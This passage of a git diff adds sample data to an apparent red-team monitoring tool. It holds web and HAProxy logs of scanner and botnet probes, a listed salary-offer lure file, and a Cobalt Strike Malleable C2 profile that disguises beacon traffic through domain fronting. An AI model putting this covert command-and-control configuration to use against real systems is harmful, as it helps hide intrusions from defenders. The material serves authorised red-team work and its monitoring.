NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" +139.196.154.23 unknown unknown [03/31 21:36:11 UTC] "GET /TP/index.php" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" +139.196.154.23 unknown unknown [03/31 21:36:12 UTC] "GET /thinkphp/html/public/index.php" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" +139.196.154.23 unknown unknown [03/31 21:36:12 UTC] "GET /" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" +37.49.226.140 unknown unknown [03/31 21:43:05 UTC] "GET /incl/image_test.shtml" 404 0 "" "null" +96.225.45.30 unknown unknown [03/31 23:13:43 UTC] "POST /boaform/admin/formPing" 404 0 "" "polaris botnet" +80.82.65.234 unknown unknown [03/31 23:56:38 UTC] "POST /cgi-bin/mainfunction.cgi" 404 0 "" "Welcome" diff --git a/elkserver/mounts/sample-data/logs/cobaltstrike/logs/200401/weblog_80.log b/elkserver/mounts/sample-data/logs/cobaltstrike/logs/200401/weblog_80.log new file mode 100644 index 00000000..1d06370b --- /dev/null +++ b/elkserver/mounts/sample-data/logs/cobaltstrike/logs/200401/weblog_80.log @@ -0,0 +1,54 @@ +51.254.59.113 unknown unknown [04/01 00:05:12 UTC] "GET /" 404 0 "" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" +171.67.70.85 unknown unknown [04/01 01:18:13 UTC] "GET /" 404 0 "" "Mozilla/5.0 zgrab/0.x" +192.241.237.84 unknown unknown [04/01 01:23:10 UTC] "GET /" 404 0 "" "Mozilla/5.0 zgrab/0.x" +159.65.11.106 unknown unknown [04/01 01:23:57 UTC] "GET /" 404 0 "" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)" +159.65.11.106 unknown unknown [04/01 01:24:03 UTC] "GET /" 404 0 "" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)" +54.213.3.215 unknown unknown [04/01 01:42:27 UTC] "OPTIONS /" 200 0 "" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36" +138.75.193.254 unknown unknown [04/01 02:16:31 UTC] "POST /boaform/admin/formPing" 404 0 "" "polaris botnet" +71.6.232.4 unknown unknown [04/01 02:35:46 UTC] "GET /" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36" +45.182.136.232 unknown unknown [04/01 02:37:54 UTC] "GET /" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" +85.187.124.112 unknown unknown [04/01 02:37:57 UTC] "GET /" 404 0 "" "null" +145.220.25.28 unknown unknown [04/01 02:42:20 UTC] "GET /cgi-bin/mainfunction.cgi" 404 0 "" "Mozilla/5.0 zgrab/0.x" +2.179.112.8 unknown unknown [04/01 03:34:53 UTC] "GET /" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" +208.91.109.90 unknown unknown [04/01 04:29:51 UTC] "HEAD /robots.txt" 404 0 "" "null" +73.202.28.126 unknown unknown [04/01 05:48:16 UTC] "GET /" 404 0 "" "null" +95.38.210.99 unknown unknown [04/01 06:47:53 UTC] "GET /" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" +80.82.65.234 unknown unknown [04/01 07:20:05 UTC] "POST /cgi-bin/mainfunction.cgi" 404 0 "" "Welcome" +120.24.74.208 unknown unknown [04/01 07:31:20 UTC] "GET /TP/public/index.php" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" +36.89.49.161 unknown unknown [04/01 07:32:24 UTC] "GET /" 404 0 "" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7" +171.67.70.85 unknown unknown [04/01 07:32:26 UTC] "GET /" 404 0 "" "Mozilla/5.0 zgrab/0.x" +175.24.138.30 unknown unknown [04/01 07:32:56 UTC] "GET /TP/public/index.php" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" +175.24.138.30 unknown unknown [04/01 07:32:56 UTC] "GET /TP/index.php" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" +175.24.138.30 unknown unknown [04/01 07:32:57 UTC] "GET /thinkphp/html/public/index.php" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" +175.24.138.30 unknown unknown [04/01 07:32:57 UTC] "GET /html/public/index.php" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" +175.24.138.30 unknown unknown [04/01 07:32:58 UTC] "GET /public/index.php" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" +175.24.138.30 unknown unknown [04/01 07:32:58 UTC] "GET /TP/html/public/index.php" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" +175.24.138.30 unknown unknown [04/01 07:33:00 UTC] "GET /elrekt.php" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" +175.24.138.30 unknown unknown [04/01 07:33:00 UTC] "GET /index.php" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" +175.24.138.30 unknown unknown [04/01 07:33:04 UTC] "GET /" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" +217.168.73.37 unknown unknown [04/01 07:39:00 UTC] "GET /" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" +208.91.109.90 unknown unknown [04/01 08:55:34 UTC] "HEAD /robots.txt" 404 0 "" "null" +124.82.96.138 unknown unknown [04/01 08:57:47 UTC] "GET /" 404 0 "" "null" +108.178.205.178 unknown unknown [04/01 10:19:18 UTC] "POST /cgi-bin/mainfunction.cgi" 404 0 "" "XTC" +162.243.130.216 unknown unknown [04/01 10:33:29 UTC] "GET /" 404 0 "" "Mozilla/5.0 zgrab/0.x" +175.138.186.168 unknown unknown [04/01 10:57:50 UTC] "GET /" 404 0 "" "null" +193.121.10.12 unknown unknown [04/01 13:05:03 UTC] "GET /" 404 0 "" "null" +187.94.113.145 unknown unknown [04/01 13:10:39 UTC] "GET /" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" +87.21.245.125 unknown unknown [04/01 13:27:07 UTC] "GET /shell" 404 0 "" "Mozilla/5.0" +171.67.70.85 unknown unknown [04/01 13:43:26 UTC] "GET /" 404 0 "" "Mozilla/5.0 zgrab/0.x" +42.189.87.55 unknown unknown [04/01 13:59:55 UTC] "GET /" 404 0 "" "null" +42.189.87.55 unknown unknown [04/01 13:59:57 UTC] "GET /" 404 0 "" "null" +5.189.176.208 unknown unknown [04/01 15:52:34 UTC] "GET /" 404 0 "" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)" +223.71.167.165 unknown unknown [04/01 15:57:48 UTC] "GET /" 404 0 "" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0" +162.243.129.242 unknown unknown [04/01 17:11:12 UTC] "GET /portal/redlion" 404 0 "" "Mozilla/5.0 zgrab/0.x" +168.228.115.250 unknown unknown [04/01 17:32:59 UTC] "GET /" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" +171.67.70.85 unknown unknown [04/01 19:44:56 UTC] "GET /" 404 0 "" "Mozilla/5.0 zgrab/0.x" +71.6.146.186 unknown unknown [04/01 19:48:35 UTC] "GET /" 404 0 "" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" +71.6.146.186 unknown unknown [04/01 19:48:35 UTC] "GET /robots.txt" 404 0 "" "null" +71.6.146.186 unknown unknown [04/01 19:48:36 UTC] "GET /sitemap.xml" 404 0 "" "null" +71.6.146.186 unknown unknown [04/01 19:48:36 UTC] "GET /.well-known/security.txt" 404 0 "" "null" +92.118.160.13 unknown unknown [04/01 20:26:42 UTC] "GET /" 404 0 "" "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com" +95.27.223.221 unknown unknown [04/01 20:32:16 UTC] "GET /" 404 0 "" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7" +51.68.70.66 unknown unknown [04/01 20:34:37 UTC] "GET /" 404 0 "" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)" +23.30.23.174 unknown unknown [04/01 20:46:22 UTC] "POST /boaform/admin/formPing" 404 0 "" "polaris botnet" +77.49.125.192 unknown unknown [04/01 20:56:08 UTC] "GET /shell" 404 0 "" "Hello, world" diff --git a/elkserver/mounts/sample-data/logs/cobaltstrike/logs/200402/weblog_80.log b/elkserver/mounts/sample-data/logs/cobaltstrike/logs/200402/weblog_80.log new file mode 100644 index 00000000..13843b3a Binary files /dev/null and b/elkserver/mounts/sample-data/logs/cobaltstrike/logs/200402/weblog_80.log differ diff --git a/elkserver/mounts/sample-data/logs/cobaltstrike/logs/200403/weblog_80.log b/elkserver/mounts/sample-data/logs/cobaltstrike/logs/200403/weblog_80.log new file mode 100644 index 00000000..b8a538b4 Binary files /dev/null and b/elkserver/mounts/sample-data/logs/cobaltstrike/logs/200403/weblog_80.log differ diff --git a/elkserver/mounts/sample-data/logs/cobaltstrike/profiles/.DS_Store b/elkserver/mounts/sample-data/logs/cobaltstrike/profiles/.DS_Store new file mode 100644 index 00000000..5008ddfc Binary files /dev/null and b/elkserver/mounts/sample-data/logs/cobaltstrike/profiles/.DS_Store differ diff --git a/elkserver/mounts/sample-data/logs/cobaltstrike/profiles/MallableConfig-DomainFronting.profile b/elkserver/mounts/sample-data/logs/cobaltstrike/profiles/MallableConfig-DomainFronting.profile new file mode 100644 index 00000000..275eff4b --- /dev/null +++ b/elkserver/mounts/sample-data/logs/cobaltstrike/profiles/MallableConfig-DomainFronting.profile @@ -0,0 +1,69 @@ +# Part of RedELK +# +# This is a basic example mallable configuration file for CobaltStrike that works with RedELK +# +# Author: Outflank B.V. / Marc Smeets +# +# Important 1 - change the value of $NameOfYourDomainFrontingEndpoint in the config below to the name of your DomainFronting endpoint name, e.g. somefancyname.azureedgee.net +# Important 2 - configure the listeners in CobaltStrike accordingly: set the HTTP Host Header to the name of your DomainFronting endpoint name, and set the HTTP Hosts to a frontable domain. +# + +set sleeptime "5000"; +set jitter "10"; +set useragent "Mozilla/5.0 (compatible, MSIE 11, Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko"; + +http-config { + set headers "Date, Server, Content-Length, Keep-Alive, Connection, Content-Type"; + header "Server" "Apache"; + header "Keep-Alive" "timeout=5, max=100"; + header "Connection" "Keep-Alive"; + set trust_x_forwarded_for "true"; +} + +http-get { + set uri "/TRAINING-BEACON"; + + client { + header "Accept" "*/*"; + header "Pragma" "no-cache"; + header "Connection" "Keep-Alive"; + header "Host" "redelkdemo.azureedge.net"; + metadata { + base64; + header "Cookie"; + } + } + + server { + header "Content-Type" "application/octet-stream"; + + output { + print; + } + } +} + +http-post { + set uri "/TRAINING-BEACON/submit.php"; + client { + header "Content-Type" "application/octet-stream"; + header "Host" "redelkdemo.azureedge.net"; + + id { + #netbios; + parameter "id"; + } + + output { + print; + } + } + + server { + header "Content-Type" "text/html"; + + output { + print; + } + } +} diff --git a/elkserver/mounts/sample-data/logs/cobaltstrike/uploads/OfferNr2020F6592_salary.doc b/elkserver/mounts/sample-data/logs/cobaltstrike/uploads/OfferNr2020F6592_salary.doc new file mode 100644 index 00000000..9c0ebf32 Binary files /dev/null and b/elkserver/mounts/sample-data/logs/cobaltstrike/uploads/OfferNr2020F6592_salary.doc differ diff --git a/elkserver/mounts/sample-data/logs/haproxy.log b/elkserver/mounts/sample-data/logs/haproxy.log new file mode 100644 index 00000000..4b538851 --- /dev/null +++ b/elkserver/mounts/sample-data/logs/haproxy.log @@ -0,0 +1,25 @@ +Apr 3 06:29:48 redelkdemo-redirb1 haproxy[7059]: GMT:03/Apr/2020:04:29:45 +0000 frontend:www-http/redelkdemo-redirb1/167.71.58.116:80 backend:decoy-www client:169.197.108.6:49196 xforwardedfor:- headers:{|Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 |167.71.58.116|||||} statuscode:503 request:GET / HTTP/1.1 +Apr 3 07:05:56 redelkdemo-redirb1 haproxy[7059]: GMT:03/Apr/2020:05:05:53 +0000 frontend:www-http/redelkdemo-redirb1/167.71.58.116:80 backend:decoy-www client:70.113.157.223:41760 xforwardedfor:- headers:{|||||||} statuscode:503 request:GET / HTTP/1.1 +Apr 3 09:05:59 redelkdemo-redirb1 haproxy[7059]: GMT:03/Apr/2020:07:05:54 +0000 frontend:www-http/redelkdemo-redirb1/167.71.58.116:80 backend:decoy-www client:51.38.57.199:61000 xforwardedfor:- headers:{|masscan/1.0 (https://github.com/robertdavidgraham/masscan)||||||} statuscode:503 request:GET / HTTP/1.0 +Apr 3 09:06:05 redelkdemo-redirb1 haproxy[7059]: GMT:03/Apr/2020:07:06:00 +0000 frontend:www-http/redelkdemo-redirb1/167.71.58.116:80 backend:decoy-www client:51.38.57.199:61000 xforwardedfor:- headers:{|masscan/1.0 (https://github.com/robertdavidgraham/masscan)||||||} statuscode:503 request:GET / HTTP/1.0 +Apr 3 09:17:13 redelkdemo-redirb1 haproxy[7059]: GMT:03/Apr/2020:07:17:08 +0000 frontend:www-http/redelkdemo-redirb1/167.71.58.116:80 backend:decoy-www client:188.157.132.206:40459 xforwardedfor:- headers:{|||||||} statuscode:503 request:GET / HTTP/1.1 +Apr 3 09:20:47 redelkdemo-redirb1 haproxy[7059]: GMT:03/Apr/2020:07:20:44 +0000 frontend:www-http/redelkdemo-redirb1/167.71.58.116:80 backend:decoy-www client:188.157.132.206:43292 xforwardedfor:- headers:{|||||||} statuscode:503 request:GET / HTTP/1.1 +Apr 3 09:22:56 redelkdemo-redirb1 haproxy[7059]: GMT:03/Apr/2020:07:22:52 +0000 frontend:www-http/redelkdemo-redirb1/167.71.58.116:80 backend:decoy-www client:188.157.132.206:45081 xforwardedfor:- headers:{|||||||} statuscode:503 request:GET / HTTP/1.1 +Apr 3 09:43:40 redelkdemo-redirb1 haproxy[7059]: GMT:03/Apr/2020:07:43:37 +0000 frontend:www-http/redelkdemo-redirb1/167.71.58.116:80 backend:decoy-www client:117.102.229.246:53808 xforwardedfor:- headers:{|Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7|167.71.58.116:80|||||} statuscode:503 request:GET / HTTP/1.1 +Apr 3 10:11:30 redelkdemo-redirb1 haproxy[7059]: GMT:03/Apr/2020:08:11:27 +0000 frontend:www-http/redelkdemo-redirb1/167.71.58.116:80 backend:decoy-www client:95.7.54.51:48393 xforwardedfor:- headers:{|Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7|167.71.58.116:80|||||} statuscode:503 request:GET / HTTP/1.1 +Apr 3 10:39:44 redelkdemo-redirb1 haproxy[7059]: GMT:03/Apr/2020:08:39:44 +0000 frontend:www-http/redelkdemo-redirb1/167.71.58.116:80 backend:www-http client:45.136.108.20:426 xforwardedfor:- headers:{|||||||} statuscode:400 request: +Apr 3 10:41:28 redelkdemo-redirb1 haproxy[7059]: GMT:03/Apr/2020:08:41:25 +0000 frontend:www-http/redelkdemo-redirb1/167.71.58.116:80 backend:decoy-www client:5.101.0.209:33604 xforwardedfor:- headers:{|Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36|167.71.58.116:80|||||} statuscode:503 request:GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1 +Apr 3 10:46:56 redelkdemo-redirb1 haproxy[7059]: GMT:03/Apr/2020:08:46:53 +0000 frontend:www-http/redelkdemo-redirb1/167.71.58.116:80 backend:decoy-www client:72.181.216.126:37570 xforwardedfor:- headers:{|XTC|127.0.0.1|||||} statuscode:503 request:POST /cgi-bin/mainfunction.cgi HTTP/1.1 +Apr 3 10:46:56 redelkdemo-redirb1 haproxy[7059]: GMT:03/Apr/2020:08:46:53 +0000 frontend:www-http/redelkdemo-redirb1/167.71.58.116:80 backend:decoy-www client:72.181.216.126:37563 xforwardedfor:- headers:{|XTC|127.0.0.1|||||} statuscode:503 request:POST /cgi-bin/mainfunction.cgi HTTP/1.1 +Apr 3 11:21:00 redelkdemo-redirb1 haproxy[7059]: GMT:03/Apr/2020:09:20:57 +0000 frontend:www-http/redelkdemo-redirb1/167.71.58.116:80 backend:decoy-www client:196.52.43.125:33233 xforwardedfor:- headers:{|Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3602.2 Safari/537.36|167.71.58.116:80|||||} statuscode:503 request:GET / HTTP/1.1 +Apr 3 11:34:03 redelkdemo-redirb1 haproxy[7059]: GMT:03/Apr/2020:09:34:00 +0000 frontend:www-http/redelkdemo-redirb1/167.71.58.116:80 backend:decoy-www client:169.1.176.44:37548 xforwardedfor:- headers:{|Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36|167.71.58.116:80|||||} statuscode:503 request:GET / HTTP/1.1 +Apr 3 11:47:24 redelkdemo-redirb1 haproxy[7059]: GMT:03/Apr/2020:09:47:21 +0000 frontend:www-http/redelkdemo-redirb1/167.71.58.116:80 backend:decoy-www client:5.101.0.209:56686 xforwardedfor:- headers:{|Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36|167.71.58.116:80|||||} statuscode:503 request:POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1 +Apr 3 11:50:52 redelkdemo-redirb1 haproxy[7059]: GMT:03/Apr/2020:09:50:49 +0000 frontend:www-http/redelkdemo-redirb1/167.71.58.116:80 backend:decoy-www client:201.71.243.54:46670 xforwardedfor:- headers:{|Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7|167.71.58.116:80|||||} statuscode:503 request:GET / HTTP/1.1 +Apr 3 12:01:03 redelkdemo-redirb1 haproxy[7059]: GMT:03/Apr/2020:10:01:00 +0000 frontend:www-http/redelkdemo-redirb1/167.71.58.116:80 backend:decoy-www client:162.243.129.30:36344 xforwardedfor:- headers:{|Mozilla/5.0 zgrab/0.x|167.71.58.116|||||} statuscode:503 request:GET /hudson HTTP/1.1 +Apr 3 12:55:35 redelkdemo-redirb1 haproxy[7059]: GMT:03/Apr/2020:10:55:32 +0000 frontend:www-http/redelkdemo-redirb1/167.71.58.116:80 backend:decoy-www client:200.5.113.138:51881 xforwardedfor:- headers:{|polaris botnet||||||} statuscode:503 request:POST /boaform/admin/formPing HTTP/1.1 +Apr 3 13:14:12 redelkdemo-redirb1 haproxy[7059]: GMT:03/Apr/2020:11:14:09 +0000 frontend:www-http/redelkdemo-redirb1/167.71.58.116:80 backend:decoy-www client:46.100.228.8:49376 xforwardedfor:- headers:{|Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36|167.71.58.116:80|||||} statuscode:503 request:GET / HTTP/1.1 +Apr 3 14:49:35 redelkdemo-redirb1 haproxy[7059]: GMT:03/Apr/2020:12:49:32 +0000 frontend:www-http/redelkdemo-redirb1/167.71.58.116:80 backend:decoy-www client:171.67.70.85:48350 xforwardedfor:- headers:{|Mozilla/5.0 zgrab/0.x|167.71.58.116|||||} statuscode:503 request:GET / HTTP/1.1 +Apr 3 16:19:23 redelkdemo-redirb1 haproxy[7059]: GMT:03/Apr/2020:14:19:23 +0000 frontend:www-http/redelkdemo-redirb1/167.71.58.116:80 backend:www-http client:176.58.249.102:52279 xforwardedfor:- headers:{|||||||} statuscode:400 request: +Apr 3 16:58:18 redelkdemo-redirb1 haproxy[7059]: GMT:03/Apr/2020:14:58:15 +0000 frontend:www-http/redelkdemo-redirb1/167.71.58.116:80 backend:decoy-www client:80.232.185.213:40262 xforwardedfor:- headers:{|Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36|167.71.58.116:80|||||} statuscode:503 request:GET / HTTP/1.1 +Apr 3 16:58:18 redelkdemo-redirb1 haproxy[7059]: GMT:03/Apr/2020:14:58:15 +0000 frontend:www-http/redelkdemo-redirb1/167.71.58.116:80 backend:c2-http client:80.232.185.213:40262 xforwardedfor:- headers:{|Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36|167.71.58.116:80|||||} statuscode:503 request:GET / HTTP/1.1 +Apr 3 16:58:18 redelkdemo-redirb1 haproxy[7059]: GMT:04/Apr/2020:14:58:15 +0000 frontend:www-http/redelkdemo-redirb1/167.71.58.116:80 backend:c2-http client:80.232.185.213:40262 xforwardedfor:- headers:{|Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36|167.71.58.116:80|||||} statuscode:503 request:GET / HTTP/1.1 diff --git a/elkserver/mounts/sample-data/logs/nginx.log b/elkserver/mounts/sample-data/logs/nginx.log new file mode 100644 index 00000000..e69de29b diff --git a/elkserver/redelk-dev.yml b/elkserver/redelk-dev.yml index e196b595..8a9297dd 100644 --- a/elkserver/redelk-dev.yml +++ b/elkserver/redelk-dev.yml @@ -214,3 +214,16 @@ services: restart: always depends_on: - jupyter + + filebeat: + container_name: redelk-sample-data + image: docker.elastic.co/beats/filebeat:7.9.2 + networks: + - net + volumes: + - ./mounts/sample-data/filebeat.yml:/usr/share/filebeat/filebeat.yml:ro + - ./mounts/sample-data/logs:/var/log/sample-data:ro + - ./mounts/logstash-config/certs_inputs/redelkCA.crt:/usr/share/filebeat/redelkCA.crt:ro + command: ['filebeat', '-e', '-strict.perms=false'] + depends_on: + - logstash